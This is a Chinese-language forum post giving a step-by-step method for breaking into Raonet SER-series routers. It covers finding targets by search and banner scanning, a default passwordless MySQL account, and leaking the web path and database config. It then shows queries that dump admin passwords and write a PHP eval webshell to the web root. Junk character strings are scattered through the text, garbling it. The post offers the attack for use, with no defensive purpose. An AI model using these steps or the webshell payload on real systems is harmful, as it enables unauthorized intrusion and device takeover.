寻找存在漏洞的路由器方法:
$ D+ s' v) M% ~6 Y7 a; x& J% V
% w6 [! b' P, P8 |- ?$ l1:google搜索'Raonet Subscriber Ethernet Router'
% M" @3 ^8 ~1 Q4 w3 u6 q% I4 P4 T# [% a# y( B
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001/ z! k3 d/ s. `* F7 w! P) u8 e
" D @2 Y6 Z- u! r. ?
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。* l2 ^* D/ H" H: M% ~$ ~6 ~( G4 x8 g% C+ g
( `. t& s Y4 f. W
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
* y; O7 h- Z2 F+ ]7 D. ^( _
7 {; D% v7 ]8 o( t4 ?6 @ ! i9 S' F; g( o0 [
* l% ~& W2 V, q- Z) v- a# W入侵步骤:$ B5 H% N% ~/ q
, T) l$ i2 |" Y% B* p1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php! U2 G$ K5 L* `; s
6 ?' Y# t# B" Q# @! q7 T% O2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc6 \& X s0 N8 N9 [/ _2 a0 |, S
3:得到密码后连接,查看GUI管理密码:
@/ L! V' z$ K! yuse ser_500
7 h \( f) J1 j6 q$ P/ r* y1 D3 S: `select id,passwd from user;
- T! I! f: M; [6 [' c4:通过数据库写入webshell,执行命令:
1 R1 }5 j# f# |+ {use mysql;
% t2 Y2 w" {' F% H. ]& G; q9 ocreate table ok(cmd TEXT);& a* `* e+ e. F
insert into ok values("<?php @eval($_POST[cmd])?>"); G7 s$ L3 E( ]
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
7 N; b! x$ b% ^8 H6 mdrop table ok;9 b( w ^, I4 f
& q/ [. c& F. d. r% y4 `/ h
5:连接后门shell.php
$ z) O, a/ B, Z
- G4 V! W9 W4 ~% W6. 搞定!
. v: K! V0 H4 j2 }0 e* L1 o+ J/ }& M ^& I [$ H L0 Q
|
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50